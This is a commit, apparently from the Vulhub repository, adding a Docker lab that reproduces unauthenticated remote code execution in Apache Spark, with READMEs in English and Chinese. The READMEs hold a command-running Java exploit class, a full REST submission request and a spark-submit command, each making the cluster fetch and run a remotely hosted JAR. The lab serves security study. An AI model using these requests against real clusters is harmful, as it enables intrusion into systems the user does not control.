first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
spark/unacc/1.png
Normal file
BIN
spark/unacc/1.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 50 KiB |
BIN
spark/unacc/2.png
Normal file
BIN
spark/unacc/2.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 174 KiB |
131
spark/unacc/README.md
Normal file
131
spark/unacc/README.md
Normal file
@@ -0,0 +1,131 @@
|
||||
# Apache Spark Unauthorized Access Leads to Remote Code Execution
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Apache Spark is a cluster computing system that allows users to submit applications to the management node for cluster execution. If the management node has not enabled ACL (Access Control List), it becomes possible to execute arbitrary code in the cluster.
|
||||
|
||||
Reference links:
|
||||
|
||||
- https://weibo.com/ttarticle/p/show?id=2309404187794313453016
|
||||
- https://xz.aliyun.com/t/2490
|
||||
|
||||
## Vulnerability Environment
|
||||
|
||||
Execute the following command to start an Apache Spark cluster in standalone mode, which includes one master and one slave:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the environment starts, visit `http://your-ip:8080` to access the master's management page, and `http://your-ip:8081` to access the slave's management page.
|
||||
|
||||
## Vulnerability Reproduce
|
||||
|
||||
The essence of this vulnerability is that unauthorized users can submit an application to the management node, where this application is actually malicious code.
|
||||
|
||||
There are two ways to submit applications:
|
||||
|
||||
1. Using REST API
|
||||
2. Using submissions gateway (integrated in port 7077)
|
||||
|
||||
The application can be written in Java or Python. Here's a simple example class (from reference link 1):
|
||||
|
||||
```java
|
||||
import java.io.BufferedReader;
|
||||
import java.io.InputStreamReader;
|
||||
|
||||
public class Exploit {
|
||||
public static void main(String[] args) throws Exception {
|
||||
String[] cmds = args[0].split(",");
|
||||
|
||||
for (String cmd : cmds) {
|
||||
System.out.println(cmd);
|
||||
System.out.println(executeCommand(cmd.trim()));
|
||||
System.out.println("==============================================");
|
||||
}
|
||||
}
|
||||
|
||||
// https://www.mkyong.com/java/how-to-execute-shell-command-from-java/
|
||||
private static String executeCommand(String command) {
|
||||
StringBuilder output = new StringBuilder();
|
||||
|
||||
try {
|
||||
Process p = Runtime.getRuntime().exec(command);
|
||||
p.waitFor();
|
||||
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
|
||||
|
||||
String line;
|
||||
while ((line = reader.readLine()) != null) {
|
||||
output.append(line).append("\n");
|
||||
}
|
||||
} catch (Exception e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
|
||||
return output.toString();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Compile it into a JAR file and host it on any HTTP or FTP server, for example: `https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar`.
|
||||
|
||||
### Submitting Application via REST API
|
||||
|
||||
In standalone mode, the master starts an HTTP server on port 6066. We can submit a REST-formatted API request to this port:
|
||||
|
||||
```
|
||||
POST /v1/submissions/create HTTP/1.1
|
||||
Host: your-ip:6066
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Content-Type: application/json
|
||||
Connection: close
|
||||
Content-Length: 680
|
||||
|
||||
{
|
||||
"action": "CreateSubmissionRequest",
|
||||
"clientSparkVersion": "2.3.1",
|
||||
"appArgs": [
|
||||
"whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
|
||||
],
|
||||
"appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
|
||||
"environmentVariables": {
|
||||
"SPARK_ENV_LOADED": "1"
|
||||
},
|
||||
"mainClass": "Exploit",
|
||||
"sparkProperties": {
|
||||
"spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
|
||||
"spark.driver.supervise": "false",
|
||||
"spark.app.name": "Exploit",
|
||||
"spark.eventLog.enabled": "true",
|
||||
"spark.submit.deployMode": "cluster",
|
||||
"spark.master": "spark://your-ip:6066"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Here, `spark.jars` is the compiled application, mainClass is the class to run, and appArgs are the parameters passed to the application.
|
||||
|
||||

|
||||
|
||||
The response will contain a submissionId. You can then view the execution results by visiting `http://your-ip:8081/logPage/?driverId={submissionId}&logType=stdout`:
|
||||
|
||||

|
||||
|
||||
Note: While the application is submitted to the master, the results are viewed in the slave that actually executes the application (default port 8081). In real-world scenarios, there might be multiple slaves.
|
||||
|
||||
### Using the Submissions Gateway
|
||||
|
||||
If port 6066 is inaccessible or has access controls, we can use the master's main port 7077 to submit applications.
|
||||
|
||||
This can be done using Apache Spark's built-in script `bin/spark-submit`:
|
||||
|
||||
```
|
||||
bin/spark-submit --master spark://your-ip:7077 --deploy-mode cluster --class Exploit https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar id
|
||||
```
|
||||
|
||||
If the master parameter you specify is a REST server, this script will first try to submit the application using the REST API; if it's not a REST server, it will fall back to using the submission gateway.
|
||||
|
||||
The results can be viewed in the same way as described above.
|
129
spark/unacc/README.zh-cn.md
Normal file
129
spark/unacc/README.zh-cn.md
Normal file
@@ -0,0 +1,129 @@
|
||||
# Apache Spark 未授权访问导致远程代码执行
|
||||
|
||||
Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。
|
||||
|
||||
参考链接:
|
||||
|
||||
- https://weibo.com/ttarticle/p/show?id=2309404187794313453016
|
||||
- https://xz.aliyun.com/t/2490
|
||||
|
||||
## 漏洞环境
|
||||
|
||||
执行如下命令,将以standalone模式启动一个Apache Spark集群,集群里有一个master与一个slave:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
环境启动后,访问`http://your-ip:8080`即可看到master的管理页面,访问`http://your-ip:8081`即可看到slave的管理页面。
|
||||
|
||||
## 漏洞利用
|
||||
|
||||
该漏洞本质是未授权的用户可以向管理节点提交一个应用,这个应用实际上是恶意代码。
|
||||
|
||||
提交方式有两种:
|
||||
|
||||
1. 利用REST API
|
||||
2. 利用submissions网关(集成在7077端口中)
|
||||
|
||||
应用可以是Java或Python,就是一个最简单的类,如(参考链接1):
|
||||
|
||||
```java
|
||||
import java.io.BufferedReader;
|
||||
import java.io.InputStreamReader;
|
||||
|
||||
public class Exploit {
|
||||
public static void main(String[] args) throws Exception {
|
||||
String[] cmds = args[0].split(",");
|
||||
|
||||
for (String cmd : cmds) {
|
||||
System.out.println(cmd);
|
||||
System.out.println(executeCommand(cmd.trim()));
|
||||
System.out.println("==============================================");
|
||||
}
|
||||
}
|
||||
|
||||
// https://www.mkyong.com/java/how-to-execute-shell-command-from-java/
|
||||
private static String executeCommand(String command) {
|
||||
StringBuilder output = new StringBuilder();
|
||||
|
||||
try {
|
||||
Process p = Runtime.getRuntime().exec(command);
|
||||
p.waitFor();
|
||||
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
|
||||
|
||||
String line;
|
||||
while ((line = reader.readLine()) != null) {
|
||||
output.append(line).append("\n");
|
||||
}
|
||||
} catch (Exception e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
|
||||
return output.toString();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
将其编译成JAR,放在任意一个HTTP或FTP上,如`https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar`。
|
||||
|
||||
### 用REST API方式提交应用
|
||||
|
||||
standalone模式下,master将在6066端口启动一个HTTP服务器,我们向这个端口提交REST格式的API:
|
||||
|
||||
```
|
||||
POST /v1/submissions/create HTTP/1.1
|
||||
Host: your-ip:6066
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Content-Type: application/json
|
||||
Connection: close
|
||||
Content-Length: 680
|
||||
|
||||
{
|
||||
"action": "CreateSubmissionRequest",
|
||||
"clientSparkVersion": "2.3.1",
|
||||
"appArgs": [
|
||||
"whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
|
||||
],
|
||||
"appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
|
||||
"environmentVariables": {
|
||||
"SPARK_ENV_LOADED": "1"
|
||||
},
|
||||
"mainClass": "Exploit",
|
||||
"sparkProperties": {
|
||||
"spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
|
||||
"spark.driver.supervise": "false",
|
||||
"spark.app.name": "Exploit",
|
||||
"spark.eventLog.enabled": "true",
|
||||
"spark.submit.deployMode": "cluster",
|
||||
"spark.master": "spark://your-ip:6066"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
其中,`spark.jars`即是编译好的应用,mainClass是待运行的类,appArgs是传给应用的参数。
|
||||
|
||||

|
||||
|
||||
返回的包中有submissionId,然后访问`http://your-ip:8081/logPage/?driverId={submissionId}&logType=stdout`,即可查看执行结果:
|
||||
|
||||

|
||||
|
||||
注意,提交应用是在master中,查看结果是在具体执行这个应用的slave里(默认8081端口)。实战中,由于slave可能有多个。
|
||||
|
||||
### 利用submissions网关
|
||||
|
||||
如果6066端口不能访问,或做了权限控制,我们可以利用master的主端口7077,来提交应用。
|
||||
|
||||
方法是利用Apache Spark自带的脚本`bin/spark-submit`:
|
||||
|
||||
```
|
||||
bin/spark-submit --master spark://your-ip:7077 --deploy-mode cluster --class Exploit https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar id
|
||||
```
|
||||
|
||||
如果你指定的master参数是rest服务器,这个脚本会先尝试使用rest api来提交应用;如果发现不是rest服务器,则会降级到使用submission gateway来提交应用。
|
||||
|
||||
查看结果的方式与前面一致。
|
14
spark/unacc/docker-compose.yml
Normal file
14
spark/unacc/docker-compose.yml
Normal file
@@ -0,0 +1,14 @@
|
||||
services:
|
||||
master:
|
||||
image: vulhub/spark:2.3.1
|
||||
ports:
|
||||
- "8080:8080"
|
||||
- "7077:7077"
|
||||
- "6066:6066"
|
||||
slave:
|
||||
command: "slave spark://master:7077"
|
||||
image: vulhub/spark:2.3.1
|
||||
depends_on:
|
||||
- master
|
||||
ports:
|
||||
- "8081:8081"
|
Reference in New Issue
Block a user